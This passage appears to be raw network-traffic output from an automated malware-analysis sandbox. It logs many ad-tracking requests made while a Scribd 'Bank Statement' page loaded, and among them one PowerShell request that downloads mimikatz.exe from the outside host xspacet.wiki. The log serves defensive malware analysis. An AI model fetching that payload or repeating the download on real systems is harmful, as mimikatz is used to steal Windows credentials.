6%2Fs%2FurBXvsfD4VqjBtiN2FJ8BYAHUWuPcU8C4FV5HTCyLR3cyqqATE4CV%2F%2BTxDwljg9gUOjOp4%2FueAiyRXYoDJlz5aUsyHPSJCdlGpmeBdqQubfU6H2jP%2FR0%2FtwhivoeBmw8CflsuMhWlDN2HA4BOV%2FOT0%2B%2ByI1jKPbCcDoz8BhcskJSw8LJKlG15iQAdpquFLzoxOpwqos%2Fe4PUWgjsvNQlaebNCheq0XSw5NFjnGojNJCWR%2FUNbCYMOz%2FPxD8eWMnJ70aB8wpwYnjW2abUN75R4KyLunJbREz72NMwYfzSNujMrwqj9rrlsTj6swowF2CaOS7%2Fkf6suJ2TaVBZ6%2Fqwc%2Bo0EDgH476LWF6AaZ3%2Bij52naG%2Ftc3lfyao1jiBx6%2FikDbiC3fTfA1A3Q3TUjD0Z0WjxUPAB%2FtIL3Rh%2BE18ND4v8oGHIDCI%2BG3A8ODKRITPkpnWXsMpZb8wbzFHdvrjr1JxKfwKM00pQgXmk6%2FpiDvSF4Bgr0H1%2Fj1fXkEqX%2BfOQHPnub4D7%2FDlEaT0%2Bi9K6PvNO4DiRfqntbeAA9Fzgs6%2FB5Al6a0SQMLaiqX4sDE%2BPkJ3sm3wBvAWGQ8rKzirFAmhWxiozF9H7ZH6Tu%2BbD%2B6Od%2F7Vjw2u%2BPZ1jChP85W7tqpZ6QVj%2FPsJ%2FDIpadov0%2Byj%2F3MUVa8V92SkcmTlAiRgo6q%2Bb%2B8w6DfN9U3Y96Oi5eQFsnpTXKg%2FB%2Fe6%2FX8q9NXv%2FfBm%2FZNC01EYPtN5YXIyX7O87eDpOOiHVNR1WXRH9p%2F%2FLsulfgHmM8aI5iN9OJ5PfxmVZn9aD6kIjDm7lU%2Fviub9P%2B924o87rc4M8VTl69GmJXxBsxqgxhHih4bssVsR9bpVYHx6hZ
Source: global trafficHTTP traffic detected: GET /e/dtb/bid?src=600&u=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&pid=neWey2eWlAyS2&cb=0&ws=1x1&v=25.205.027&t=2000&slots=%5B%7B%22fc%22%3A%22USD%22%2C%22fp%22%3A400%2C%22id%22%3A%22aps_primis_oustream_ron%22%2C%22mt%22%3A%22v%22%7D%5D&pj=%7B%22device%22%3A%7B%22sua%22%3A%7B%22architecture%22%3A%22x86%22%2C%22bitness%22%3A%2264%22%2C%22mobile%22%3A0%2C%22model%22%3A%22%22%2C%22source%22%3A2%2C%22platform%22%3A%7B%22brand%22%3A%22Windows%22%2C%22version%22%3A%5B%2210%22%2C%220%22%2C%220%22%5D%7D%2C%22browsers%22%3A%5B%7B%22brand%22%3A%22Microsoft+Edge%22%2C%22version%22%3A%5B%22117%22%2C%220%22%2C%222045%22%2C%2247%22%5D%7D%2C%7B%22brand%22%3A%22Not%3BA%3DBrand%22%2C%22version%22%3A%5B%228%22%2C%220%22%2C%220%22%2C%220%22%5D%7D%2C%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%5B%22117%22%2C%220%22%2C%225938%22%2C%22132%22%5D%7D%5D%7D%7D%7D&schain=1.0%2C1%21freestar.com%2C1651%2C1%2C%2C%2C&sm=65ca3305-e2a6-4f6e-bcea-68b1d4844783&pubid=0ab198dd-b265-462a-ae36-74e163ad6159&gdprl=%7B%22status%22%3A%22no-cmp%22%2C%22cmpTimeout%22%3A75%7D&vm=%7B%22ids%22%3A%7B%2233across%22%3A%22v1.0013300001cFpYHAA0.1038.AtjE%2FtYZclpHZTuhg08WvS%2BrkN1XuoF8WPbeTn2c0swAqam3hWyM%2FHUVb0PKRGaBQFi8RB9%2F9mk7jFRKDMeWXQ0QU38sF8eDZIuqDFk7ypGKuR0uDV%2FeRQQgnWoY%2BVzYrCwbcNs9BHj5%2BM9GkNbQqVCfWff3%2FAWLyR7mN9vjptBuLcXfJhOwfZwAyeBn2HNQRMRgYvzBdsGCaciE94zJmhsh6pOoEe7HU7ElL0RuvHrTTK2SwQzSXYsWu4ZioCIc%2BJleDAkia939%2FsJ2%2BMbwkJbcBoFT27s7rNNVSBjcnBbO5%2BhGxeQctwnKMU5F9XddHmf8XXCYVpBLJCF7u7c3tan5mf%2FVqOVKhhfcT%2BWUgdabw7bHZviso6vS1wXNp3487P%2BdV1frgDDSltmI%2FlJfCgf%2Bj33PqUgdq%2B21Xm9ZQPgKC%2FAfkhqldmQSgS1C91x6t1Bk0woRjR0diDJiI%2BdziyvmYAgZTXFBzY6TFAtspdNTuQSyjE%2B%2Br6C%2BY%2FRav%2BneSD3%2BoB%2FdLn6ry6XPzR7Vt2c%2F0lWQ3QsXDFL4gRHrPcCesfZgNXQtF3KE6jgqxLBM2eOnaeZakKLQxnR0pC8z7hamosfCWU1CvPWbTxVwmcTm2oNKQuvDeXqdQUjgpV7HqrmBUtWX2dsTY1BQyLIpFxvv9zDLZupu7ixNzKRkIw4kBwqejQ%2Bcn496EBQanMTYijYqbyUl6b6Moafa5yeK1GSHI2%2Fqg0hnASlXt%2BdNqUgU%2BJQ1d2sXxzZrJLcDbVqPk0cyf74tHU4D91F1qn10Z6S3pSlbnbk7ur16jm7wDnBUqFvhuaJNYYudwQ%2BvESloQ1qCRHkhwBJAIDyvG8T3qfdl2ZiRx4d6DRTgPy%2BDuDfrx%2FCEU%2BZiVQ1I6oQWA5nEHIPfeWoIG%2FmIiyrS1iL8PtziGxGytGJ3XXr5nN2I0I976etf14BFMNbVWbRHcxjiXFncY2cLOSbTudgJsd%2F1bm8LsIDT4uhC0QFq%2BXTQGrW%2F8w7LslyKA7wlFm3sI%2BbH%2FnVvQ38YMVaI0aerS60syHeqwbtFeHGEkled968aSJhZ8ePbsE94vjhxQ9WxswWHYi8V45zfvZts0IBt70GrBj5Xw%2Bc8Hh5u039gltPgoc3ggtuhJICeeUvehNhPUP6v9MRHSdcYDbiD24q7H1rxHlSgfbvJDbsaLeuC0ExBHn3AFx81BlTLTLTMcqnjNpnsoCKBU%2Fv7gcWXKrGPsKtnUDyQt%2BxCUI6aIH204f1DitNhk0eCV7JIvG%2F1Us5cmBEGqEqVBtqaxHn4TlI6frGr1uWuoPn%2FERe5eg6Bk%2B935G4%3D%22%2C%22audigent%22%3A%220001yum0ea99jha6clfcgeaikjhlll68igi8eiflgfabackkc2jl%22%2C%22fabrick%22%3A%22E1%3AnNcB-cR8zPZwco1L1Geu05lKPr6rK26CHhDENyHqDRcdlSbAj5oaaihbgTrx6yx5Af_UxV2yvFbtfJT9wfoas06Atnb_KaBgHyrLSy5Lnn9g_jiTjS2RFPEkU7xm0SDR%22%2C%22id5%22%3A%22ID5*R7fkB7XeO_2RmiPyJ2jLs9PMSNV9asnfuFIQzGXBAzn6ZdNgdq7r9JGgath5MWwB%22%2C%22pubcommon%22%3A%226dbf4d45-833c-454c-b334-fbf51bba1aa6%22%2C%22quantcast%22%3A%22P0-761217323-17
Source: global trafficHTTP traffic detected: GET /ups/58818/sync?redir=true&gdpr=0&gdpr_consent= HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /exchange/sync.php?p=primis&gdpr=0&gdpr_consent= HTTP/1.1Host: pixel.rubiconproject.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: audit_p=1|p3NZOIPdcs7g2WF2nGvUU+SRTrMPTneuTTZKI3TR72YkDyl9IZRjbpAY6ebCcuOOjxj9g7jJDXlCbuL7wqM7W24/AOYgyMTzmjbisE4m2Mfme0rGRDIQp2HZvLHXgE7qKreeM+I17A+st7tELqFbcc9dWb1LRf1hfY0V14FIbwNNc4QTpadywtzpQ7vzkXQ/; khaos_p=M7A5IT3R-G-GNOQ
Source: global trafficHTTP traffic detected: GET /track/cmb/generic?ttd_pid=6gvshk1&ttd_tpi=1&ttd_puid=67b433ed2421e&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /live/liveCS.php?source=external&gdpr=0&gdpr_consent=&advId=98&advUuid=35b1ff19-ce3f-4652-8688-79bcb2c9acd3 HTTP/1.1Host: live.primis.techConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: csuuid=67b433ed2421e
Source: global trafficHTTP traffic detected: GET /getuid?https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D105%26advUuid%3D%24UID%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: XANDR_PANID=yoDWIi40QA0l92CMfnRGTVK6j8ph7xMEE2hovwWpxM3jlu8-JszEEuNouxtI9R3D-QUOCwsGww6GCGm89qzRlyyUz_8TuJUoh7BvVk-kenM.; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /cksync?gdpr=0&gdpr_consent=&cs=34&type=pri&ovsid=67b433ed2421e&redirect=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D127%26advUuid%3D%3Cvsid%3E%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: cs.media.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /getuid?ld=1&gdpr=0&cmp_cs=&us_privacy=&redir=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D121%26advUuid%3D%24UID HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: tluidp=1275989254868253457531
Source: global trafficHTTP traffic detected: GET /pubsync?gdpr=0&gdpr_consent=&redir=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D126%26advUuid%3D%5Btvid%5D HTTP/1.1Host: mb9eo.publishers.tremorhub.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/cmb/generic?ttd_pid=tapad&ttd_tpi=1&ttd_puid=6ca034eb-2728-4fa9-b456-793a6491b4b3%252Chttps%25253A%25252F%25252Fids.ad.gt%25252Fapi%25252Fv1%25252Ftapad_match%25253Fid%25253DAU1D-0100-001739863021-EHT1L4CA-5M76%252526tapad_id%25253D6ca034eb-2728-4fa9-b456-793a6491b4b3%252C&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /iu3?cm3ppd=1&d=dtb-pub&csif=t&dl=n-mediagrid_n-index_rx_n-acuityads_n-MediaNet_ox-db5_n-colossusMedia_n-cadent_n-adman-v2_n-onetag_pm-db5_n-simpli.fi_ym_n-vmg_n-nativo_sovrn_gg_n-adMediaV1_n-Ogury_n-Beeswax_smrt_n-inmobi_cnv_n-Seedtag_rbd_ppt_an-db5_n-Rise_3lift HTTP/1.1Host: s.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /ups/58818/sync?redir=true&gdpr=0&gdpr_consent=&verify=true HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pixel?gdpr=0&gdpr_consent=&redir=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D130%26advUuid%3D%24UID HTTP/1.1Host: ap.lijit.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /assets/bt-rlink-storage-OAPAZjOc.html HTTP/1.1Host: cdn.btmessage.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /user-matching?id=3586&gdpr=0&gdpr_consent= HTTP/1.1Host: ads.stickyadstv.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pubsync/verify?gdpr=0&gdpr_consent=&redir=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D126%26advUuid%3D%5Btvid%5D HTTP/1.1Host: mb9eo.publishers.tremorhub.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /profiles_engine/ProfilesEngineServlet?at=20&mi=10&dpi=793790479&3rddpi=1486637409&3rdpcid=35b1ff19-ce3f-4652-8688-79bcb2c9acd3 HTTP/1.1Host: sync.intentiq.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: intentIQ=0t75g7C0hX; IQver=1.9; ASDT=0; IQMID=137264061#1739863024423; intentIQCDate=1739863024422; CSDT=UEQ6MTUxMDZfMCZVZDhad2ha; IQPData=137264061#1739863025789#0#1739863024420
Source: global trafficHTTP traffic detected: GET /api/sync?callerId=21&redirectUri=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D140%26advUuid%3D%5Bssb_sync_pid%5D%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ssbsync-global.smartadserver.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /bh/rtset?ev=1&gdpr=0&gdpr_consent=&pid=562615&rurl=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11592%26uid%3D%25%25VGUID%25%25&us_privacy=%5BUS_PRIVACY%5D HTTP/1.1Host: bh.contextweb.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /usync/?gdpr=0&gdpr_consent=&pubId=69f48c2160c8113 HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /oRTB?gdpr=0&gdpr_consent=&redirect=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11595%26id%3D%7BID5UID%7D HTTP/1.1Host: sync.inmobi.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /stein/mimikatz.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: xspacet.wikiConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /universal/v1?supply_id=Wog2sp89&gdpr=0&gdpr_consent= HTTP/1.1Host: match.sharethrough.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/user/pixel/?redirect=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D151%26advUuid%3D%24%7BuserId%7D%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: sync.kueezrtb.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /iu3?cm3ppd=1&d=dtb-pub&csif=t&dl=n-mediagrid_n-index_rx_n-acuityads_n-MediaNet_ox-db5_n-colossusMedia_n-cadent_n-adman-v2_n-onetag_pm-db5_n-simpli.fi_ym_n-vmg_n-nativo_sovrn_gg_n-adMediaV1_n-Ogury_n-Beeswax_smrt_n-inmobi_cnv_n-Seedtag_rbd_ppt_an-db5_n-Rise_3lift&dcc=t HTTP/1.1Host: s.amazon-adsystem.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
